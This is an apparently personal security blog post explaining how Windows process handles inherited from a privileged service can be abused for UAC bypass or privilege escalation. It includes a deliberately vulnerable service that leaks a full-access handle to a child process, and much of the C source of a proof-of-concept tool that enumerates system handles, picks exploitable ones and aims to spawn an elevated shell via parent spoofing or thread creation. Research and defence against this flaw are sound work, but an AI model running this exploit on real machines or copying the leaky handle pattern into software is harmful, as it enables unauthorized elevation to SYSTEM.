Exploiting Inherited Handles

2022-05-06

Learn about how privileged process handles, when inherited, can lead to UAC bypass/privilege escalation.

Introduction

Abusing inherited handles seems like a hot topic recently, so I decided to do some research and blog about it.

First of all, what are handles? Handles are Window’s way of providing access to objects. These objects include processes, threads, tokens, mutexes etc.

Handles are of type HANDLE, as defined below.

1	typedef PVOID HANDLE;

Although its type definition seems useless, this is just the POV of user processes. To the kernel, handles are indexes into a handle table, unique to every process. Each row in the handle table is typed SYSTEM_HANDLE

typedef struct _SYSTEM_HANDLE
{
    DWORD       dwProcessId;
    BYTE        bObjectType;
    BYTE        bFLags;
    WORD        wValue;
    PVOID       pAddress;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

and gives the kernel information such as

dwProcessId: the pid of the process holding the handle
bObjectType: what object is the handle referring to (process, thread, mutex etc)
bFlags: some information regarding the handle, such as whether it is inherited from a parent process
wValue: the actual handle value returned to the user process
pAddress: address of the object the handle is referring to in kernelspace
GrantedAccess: type of access the handle has over the object (in terms of process, an example will be PROCESS_ALL_ACCESS for full access)

In essence, if a process possesses a handle to an object, it can perform a range of actions on that object, depending on the access the handle has.

In terms of a process handle, access types include

PROCESS_ALL_ACCESS: full control over the process
PROCESS_CREATE_PROCESS: able to create arbitrary processes under that process, thus inheriting its privileges
PROCESS_CREATE_THREAD: able to run arbitrary code in the process’ context, thus with its privileges too
PROCESS_DUP_HANDLE: able to duplicate the current handle in the process’ context with arbitrary access rights, including PROCESS_ALL_ACCESS

Now this starts to sound dangerous doesn’t it.

Imagine this scenario. There’s a privileged service running as system on the machine, we call it test.exe.

test.exe opens up a handle to a privileged process to do some work, in this case itself, with full privileges.

1	hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

It sets the second argument of OpenProcess to TRUE, which means the handle can be inherited by any child process it creates, if it chooses to.

Afterwards, test.exe spawns a process client.exe with the privileges of the logged on user.


This is commonly done for user management services such as SSH services, which have to spawn a shell as the logged on user.

// get PID of user low privileged process
if ( pid = FindTarget("explorer.exe") ) 
	hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
else
	return -1;
	
// extract low privilege token from a user's process
if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
    CloseHandle(hUserProc);
    return -1;
}

// spawn a child process with low privs
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
CreateProcessAsUserA(hUserToken, "C:\\users\\me\\client.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

It does this by getting the token of explorer.exe, which is the same privilege as the logged on user by default.

If we look closely at the CreateProcessAsUserA call, one of the arguments is TRUE. This allows the child process client.exe to inherit all inheritable handles from test.exe, which includes the process handle to test.exe.

Due to these insecure programming practices, client.exe now possesses a token with full access to a privileged process.

If we control client.exe, we can easily retrieve the process token. However, let’s try to write a tool that can automatically search for such leaked tokens in all the processes running on the system, and exploit them for happiness.

Environment Setup

As mentioned above, we’ll need to simulate a vulnerable service and client in order to create the scenario where this vulnerability is present.

test.c

#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#pragma comment (lib, "advapi32")

TCHAR* serviceName = TEXT("HandleLeakSrv");
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
HANDLE stopServiceEvent = 0;


//Find PID of a proces from its name
int FindTarget(const char *procname) {

	HANDLE hProcSnap;
	PROCESSENTRY32 pe32;
	int pid = 0;
			
	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
			
	pe32.dwSize = sizeof(PROCESSENTRY32); 
			
	if (!Process32First(hProcSnap, &pe32)) {
			CloseHandle(hProcSnap);
			return 0;
	}
			
	while (Process32Next(hProcSnap, &pe32)) {
			if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
					pid = pe32.th32ProcessID;
					break;
			}
	}
			
	CloseHandle(hProcSnap);
			
	return pid;
}


int Exploit(void) {
	
  	STARTUPINFOA si;
  	PROCESS_INFORMATION pi;
	int pid = 0;
  	HANDLE hUserToken;
	HANDLE hUserProc;
  	HANDLE hProc;

	// open a handle to itself (privileged process) - this gets leaked!
  	hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

	// get PID of user low privileged process
	if ( pid = FindTarget("explorer.exe") ) 
		hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
	else
		return -1;
	
	// extract low privilege token from a user's process
    if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
        CloseHandle(hUserProc);
        return -1;
    }

	// spawn a child process with low privs and leaked handle
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    CreateProcessAsUserA(hUserToken, "C:\\users\\me\\client.exe", 
						NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

	CloseHandle(hProc);
	CloseHandle(hUserProc);
    return 0;
}



void WINAPI ServiceControlHandler( DWORD controlCode ) {
	switch ( controlCode ) {
		case SERVICE_CONTROL_SHUTDOWN:
		case SERVICE_CONTROL_STOP:
			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
			SetServiceStatus( serviceStatusHandle, &serviceStatus );

			SetEvent( stopServiceEvent );
			return;

		case SERVICE_CONTROL_PAUSE:
			break;

		case SERVICE_CONTROL_CONTINUE:
			break;

		case SERVICE_CONTROL_INTERROGATE:
			break;

		default:
			break;
	}
	SetServiceStatus( serviceStatusHandle, &serviceStatus );
}

void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
	// initialise service status
	serviceStatus.dwServiceType = SERVICE_WIN32;
	serviceStatus.dwCurrentState = SERVICE_STOPPED;
	serviceStatus.dwControlsAccepted = 0;
	serviceStatus.dwWin32ExitCode = NO_ERROR;
	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
	serviceStatus.dwCheckPoint = 0;
	serviceStatus.dwWaitHint = 0;

	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );

	if ( serviceStatusHandle ) {
		// service is starting
		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
		SetServiceStatus( serviceStatusHandle, &serviceStatus );

		// do initialisation here
		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );

		// running
		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
		serviceStatus.dwCurrentState = SERVICE_RUNNING;
		SetServiceStatus( serviceStatusHandle, &serviceStatus );

		Exploit();
		WaitForSingleObject( stopServiceEvent, -1 );

		// service was stopped
		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
		SetServiceStatus( serviceStatusHandle, &serviceStatus );

		// do cleanup here
		CloseHandle( stopServiceEvent );
		stopServiceEvent = 0;

		// service is now stopped
		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
		serviceStatus.dwCurrentState = SERVICE_STOPPED;
		SetServiceStatus( serviceStatusHandle, &serviceStatus );
	}
}


void InstallService() {
	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );

	if ( serviceControlManager ) {
		TCHAR path[ _MAX_PATH + 1 ];
		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
			SC_HANDLE service = CreateService( serviceControlManager,
							serviceName, serviceName,
							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
							0, 0, 0, 0, 0 );
			if ( service )
				CloseServiceHandle( service );
		}
		CloseServiceHandle( serviceControlManager );
	}
}

void UninstallService() {
	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );

	if ( serviceControlManager ) {
		SC_HANDLE service = OpenService( serviceControlManager,
			serviceName, SERVICE_QUERY_STATUS | DELETE );
		if ( service ) {
			SERVICE_STATUS serviceStatus;
			if ( QueryServiceStatus( service, &serviceStatus ) ) {
				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
					DeleteService( service );
			}
			CloseServiceHandle( service );
		}
		CloseServiceHandle( serviceControlManager );
	}
}

int _tmain( int argc, TCHAR* argv[] )
{
	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
		InstallService();
	}
	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
		UninstallService();
	}
	else  {
		SERVICE_TABLE_ENTRY serviceTable[] = {
			{ serviceName, ServiceMain },
			{ 0, 0 }
		};
	
		StartServiceCtrlDispatcher( serviceTable );
	}	

	return 0;
}

Found this piece of code somewhere on the internet, I don’t write c++ syntax :p

client.c

#include <Windows.h>

int main(void)
{
	Sleep(100000000);
	return 0;
}

Simulates a “shell” process, that runs for a long time.

Now start test.exe as a service and the setup should run perfectly.

Overview

We’ll use some unexported function and types, so let’s define them first.

#ifndef POC_H
#define POC_H

#define SystemHandleInformation 0x10

typedef struct _SYSTEM_HANDLE
{
    DWORD       dwProcessId;
    BYTE        bObjectType;
    BYTE        bFLags;
    WORD        wValue;
    PVOID       pAddress;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    DWORD           NumberOfHandles;
    SYSTEM_HANDLE   Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (NTAPI *NQSI) (
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

typedef struct _PID_HANDLE_OBJECT_MAP
{
    DWORD                         pid;
    HANDLE                        handle;
    void                          *object;
    struct _PID_HANDLE_OBJECT_MAP *next;
} PID_HANDLE_OBJECT_MAP, *PPID_HANDLE_OBJECT_MAP;

typedef struct _TARGET
{
    DWORD           pid;
    HANDLE          handle;
    ACCESS_MASK     access_type;
    DWORD           integrity;
    struct _TARGET  *next;
} TARGET, *PTARGET;

NTSTATUS resolve_symbols(void);
NTSTATUS init_map(void);
NTSTATUS query_handles(_Out_ PSYSTEM_HANDLE_INFORMATION *handles);
NTSTATUS fill_map(_In_ PSYSTEM_HANDLE_INFORMATION handles);
NTSTATUS search_targets(_In_ PSYSTEM_HANDLE_INFORMATION handles);
NTSTATUS get_integrity(_In_ DWORD pid, _Out_ PDWORD integrity_level);

NTSTATUS spoof_parent(_In_ DWORD pid, _In_ HANDLE handle);
NTSTATUS create_thread(_In_ DWORD pid, _In_ HANDLE handle);

NTSTATUS get_base_address(_In_ DWORD pid, _In_ const wchar_t *name, _Out_ UINT64 *base);

#endif

The undocumented function is NtQuerySystemInformation(), which we will resolve at runtime. Other functions are self explanatory and detailed code will be shown later.

We’ll be using two linked lists. One to map pid, handle and object address. The second is to collect potential targets that we’ll attempt to exploit.

Why do we need the first linked list? Because NtQuerySystemInformation() only gives us the PID of the process possessing the handle. However, we need the PID of the process the handle refers to, in order to check its integrity level and determine whether we should attempt to exploit it. For example, if the process the handle refers to is of lower or same integrity level as us, then we won’t benefit from exploiting it.

By creating the map(linked list), we can map the object address(actual address of the process’ EPROCESS structure in kernelspace) to the pid of the process the handle is pointing to.

This way, when we get the object address from NtQuerySystemInformation(), we can look up its corresponding pid.

Before going into the details, let’s see the main function first.

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <TlHelp32.h>
#include <securitybaseapi.h>

#include "poc.h"

#define log_warn(x) (printf("[-] Err: %s\n", x))

#define zalloc(x) (calloc(x, 1))

PID_HANDLE_OBJECT_MAP g_pid_handle_object_map_head;
TARGET                g_target_head;

NQSI _NtQuerySystemInformation = (NQSI)NULL;

int main(void)
{
    PSYSTEM_HANDLE_INFORMATION handles = NULL;
    PTARGET                    cur = NULL;
    HANDLE                     clone = NULL;
    BOOL                       status;

    if (!NT_SUCCESS(resolve_symbols()))
        goto out;

    if (!NT_SUCCESS(init_map()))
        goto out;

    if (!NT_SUCCESS(query_handles(&handles)))
        goto out;

    if (!NT_SUCCESS(fill_map(handles)))
        goto out;

    if (!NT_SUCCESS(search_targets(handles)))
        goto out;

    cur = g_target_head.next;

    for (; cur; cur = cur->next) {
        if ( cur->handle && cur->access_type) {
            if ((cur->access_type == PROCESS_ALL_ACCESS) ||
                (cur->access_type & PROCESS_CREATE_PROCESS)) {
                if (NT_SUCCESS(spoof_parent(cur->pid, cur->handle))) {
                    puts("[+] Exploit successful, enjoy your shell");
                    goto out;
                }
            }
            else if (cur->access_type & PROCESS_CREATE_THREAD) {
                if (NT_SUCCESS(create_thread(cur->pid, cur->handle))) {
                    puts("[+] Exploit successful, enjoy your shell");
                    goto out;
                }
            }
            else
                puts("[*] This access is not supported yet");
        }
        else
            break;
    }

    puts("[-] No more targets to try");

out:
    if (handles)
        free(handles);

    return 0;
}

The main function is really simple, it just calls all the other functions and does error checking.

resolve_symbols

NTSTATUS resolve_symbols(void)
{
    NTSTATUS    status = STATUS_SUCCESS;
    HMODULE     ntdll = NULL;

    puts("[+] Resolving internal functions...");

    ntdll = LoadLibraryA("ntdll");
    if (ntdll == NULL) {
        log_warn("resolve_symbols::LoadLibraryA()1");
        status = STATUS_NOT_FOUND;
        goto out;
    }

    _NtQuerySystemInformation = (NQSI)GetProcAddress(ntdll, "NtQuerySystemInformation");
    if (_NtQuerySystemInformation == NULL) {
        log_warn("resolve_symbols::GetProcAddress()1");
        status = STATUS_NOT_FOUND;
        goto out;
    }

    puts("[+] All functions resolved");

out:
    return status;
}

In this case we only have one function to resolve, but I wrote it with multiple functions in mind.

init_map

NTSTATUS init_map(void)
{
    NTSTATUS                   status = STATUS_SUCCESS;
    HANDLE                     snapshot;
    PROCESSENTRY32             pe;
    int                        counter = 0;
    PPID_HANDLE_OBJECT_MAP     cur = NULL, next = NULL;
    HANDLE                     process = NULL;

    puts("[+] Opening handles to processes to initialize map");

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        log_warn("init_map::CreateToolhelp32Snapshot()1");
        status = STATUS_INVALID_HANDLE;
        goto out;
    }

    cur = (PPID_HANDLE_OBJECT_MAP)zalloc(sizeof(PID_HANDLE_OBJECT_MAP));
    if (!cur) {
        log_warn("init_map::zalloc()1");
        status = STATUS_NO_MEMORY;
        goto out;
    }
    g_pid_handle_object_map_head.next = cur;

    pe.dwSize = sizeof(PROCESSENTRY32);

    while (Process32Next(snapshot, &pe)) {
        process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe.th32ProcessID);
        if (pe.th32ProcessID == 12900)
            if (process == NULL) {
                printf("%p\n", GetLastError());
                printf("NULL\n");
            }
        if (process) {
            cur->handle = process;
            cur->pid = pe.th32ProcessID;

            counter++;

            next = (PPID_HANDLE_OBJECT_MAP)zalloc(sizeof(PID_HANDLE_OBJECT_MAP));
            if (!next) {
                log_warn("init_map::zalloc()2");
                status = STATUS_NO_MEMORY;
                goto out;
            }

            cur->next = next;
            cur = cur->next;
        }
    }

    printf("[+] Opened %d process handles\n", counter);

out:
    return status;
}

This function does slightly more. First of all it takes a snapshot of all the processes in the system. Then it attempts to open all the processes with the lowest access type required, PROCESS_QUERY_LIMITED_INFORMATION. This allows us to open even high integrity processes. Online resources state that system processes can also be opened, but I was unable to achieve so.

After opening up all the processes, it fills up the pid and handle fields of the linked lists, initializing it so the next function can insert the object addresses at the correct locations.

query_handles

NTSTATUS query_handles(_Out_ PSYSTEM_HANDLE_INFORMATION *handles)
{
    NTSTATUS                    status = STATUS_SUCCESS;
    PSYSTEM_HANDLE_INFORMATION  handle_info = NULL;
    UINT64                      handle_info_sz = 0x10000;
    int                         counter = 0;

    puts("[+] Calling NtQuerySystemInformation() to retrieve all opened handles...");

    handle_info = (PSYSTEM_HANDLE_INFORMATION)zalloc(handle_info_sz);
    if (!handle_info) {
        log_warn("query_handles::zalloc()1");
        status = STATUS_NO_MEMORY;
        goto out;
    }

    while ((status = _NtQuerySystemInformation(
        SystemHandleInformation,
        handle_info,
        handle_info_sz,
        NULL)) == STATUS_INFO_LENGTH_MISMATCH) {

        handle_info = realloc(handle_info, handle_info_sz *= 2);
        if (!handle_info) {
            log_warn("query_handles::realloc()1");
            status = STATUS_NO_MEMORY;
            goto out;
        }
    }

    if (!NT_SUCCESS(status)) {
        log_warn("fill_maps::NtQuerySystemInformation()1");
        goto out;
    }

    printf("[+] Fetched %d handles\n", handle_info->NumberOfHandles);

out:
    if (NT_SUCCESS(status))
        *handles = handle_info;
    else
        *handles = NULL;

    return status;
}

This is just a helper function to call NtQuerySystemInformation() and retrieve all the handles currently opened in the system, which of course includes those we opened in init_map().

fill_map

NTSTATUS fill_map(_In_ PSYSTEM_HANDLE_INFORMATION handles)
{
    NTSTATUS                status = STATUS_SUCCESS;
    DWORD                   own_pid;
    PPID_HANDLE_OBJECT_MAP  cur;
    int                     counter = 0;

    puts("[+] Mapping the PID, handle and object address of opened processes...");

    own_pid = GetCurrentProcessId();
    cur = g_pid_handle_object_map_head.next;
    
    for (; cur; cur=cur->next)
        for (int i = 0; i < handles->NumberOfHandles; i++)
            if (handles->Handles[i].dwProcessId == own_pid)
                if (cur->handle == handles->Handles[i].wValue) {
                    cur->object = handles->Handles[i].pAddress;
                    counter++;
                    break;
                }

    printf("[+] Maps of %d handles successfully created\n", counter);

out:
    return status;
}

In this function, we first filter out all handles not belonging to our process. This leaves us with all the handles we opened in init_map(). Then we fill in the object field, based on the handle value we retrieved.

Now, the complete mapping of pid, handle and object is completed.

Since each unique pid has an unique object address, we can use this to locate the pid that the handle refers to, by looking up the linked list with its object address.

search_targets

NTSTATUS search_targets(_In_ PSYSTEM_HANDLE_INFORMATION handles)
{
    NTSTATUS                    status = STATUS_SUCCESS;
    DWORD                       integrity;
    int                         counter = 0;
    PTARGET                     cur = NULL, next = NULL;
    PPID_HANDLE_OBJECT_MAP      cur_map;
    DWORD                       pid = 0;

    puts("[+] Searching for potential targets...");

    cur = (PTARGET)zalloc(sizeof(TARGET));
    if (!cur) {
        log_warn("search_targets::zalloc()1");
        status = STATUS_NO_MEMORY;
        goto out;
    }
    
    g_target_head.next = cur;

    for (int i = 0; i < handles->NumberOfHandles; i++) {
        cur_map = g_pid_handle_object_map_head.next;
        pid = 0;

        if (!(handles->Handles[i].bObjectType == 0x7))
            continue; // check if handle is to a process

        if (!(handles->Handles[i].GrantedAccess == PROCESS_ALL_ACCESS ||
            handles->Handles[i].GrantedAccess & PROCESS_CREATE_PROCESS ||
            handles->Handles[i].GrantedAccess & PROCESS_CREATE_THREAD ||
            handles->Handles[i].GrantedAccess & PROCESS_DUP_HANDLE ||
            handles->Handles[i].GrantedAccess & PROCESS_VM_WRITE))
            continue; // check if has desired access

        if (!(handles->Handles[i].bFLags & OBJ_INHERIT))
            continue; // check if inherited

        if (!NT_SUCCESS(get_integrity(handles->Handles[i].dwProcessId, &integrity))) {
            continue; // check if integrity is medium or lower
        }
        if (integrity > SECURITY_MANDATORY_MEDIUM_RID)
            continue; // check if integrity is medium or lower

        for (; cur_map; cur_map = cur_map->next)
            if (cur_map->object == handles->Handles[i].pAddress) {
                pid = cur_map->pid;
                break;
            }

        if (pid == 0) {
            // interesting case, not mapped might be because it's privileged
            puts("[*] Process that this handle refers to is not mapped");
            printf("  -- opened by: %d, opened process: not found, handle: 0x%x\n", handles->Handles[i].dwProcessId, handles->Handles[i].wValue);
        }

        //printf("-- opened by: %d, opened process: %d, handle of 0x%x\n", handles->Handles[i].dwProcessId, pid, handles->Handles[i].wValue);

        if (pid != 0) {
            if (NT_SUCCESS(get_integrity(pid, &integrity)))
                if (integrity != -1 && integrity <= SECURITY_MANDATORY_MEDIUM_RID)
                    continue; // check if process handle is privileged
        }
        else
            integrity = SECURITY_MANDATORY_SYSTEM_RID;

        // if pass all checks, add to targets

        cur->access_type = handles->Handles[i].GrantedAccess;
        cur->integrity = integrity;
        cur->pid = handles->Handles[i].dwProcessId;
        cur->handle = handles->Handles[i].wValue;

        counter++;
        
        next = (PTARGET)zalloc(sizeof(TARGET));
        if (!next) {
            log_warn("search_targets::zalloc()2");
            status = STATUS_NO_MEMORY;
            goto out;
        }

        cur->next = next;
        cur = cur->next;
    }
    
    printf("[+] Found %d potential targets\n", counter);

out:
    return status;
}

This function again uses the data retrieved by NtQuerySystemInformation. It filters through the handles to locate a potentially exploitable handle.

The handle must satisfy the following conditions:

It should be a process handle (although thread handles are exploitable too)
It must currently belong to a medium integrity or lower process, so we can open it and retrieve the handle
It should have the desired access rights in order for it to be exploitable
It should be inherited (so there’s a chance for it to be privileged)
It should refer to a privileged process (we’ll use the linked list to locate the pid, then check its integrity level)

Since we can’t open system processes to map their pids, let’s be optimistic and treat all unknown pids as handles to system processes.

Finally, the targets linked list is populated.

Full Code

The rest of the code are just helper functions, and can be found on the internet as well, so I’m lazy to explain them. Full code can be found on my github. (https://github.com/Y3A/Unhandled)

Conclusion

The curious reader can extend this POC and implement the functions to exploit PROCESS_DUP_HANDLE rights(pretty simple) as well as the search and exploitation of thread handles. However, I found the exploitation of thread handles to be rather unstable across builds, because we have to use ROP gadgets. More information regarding this topic can be found in the references links below, as well as the references links under their blog posts :)

cp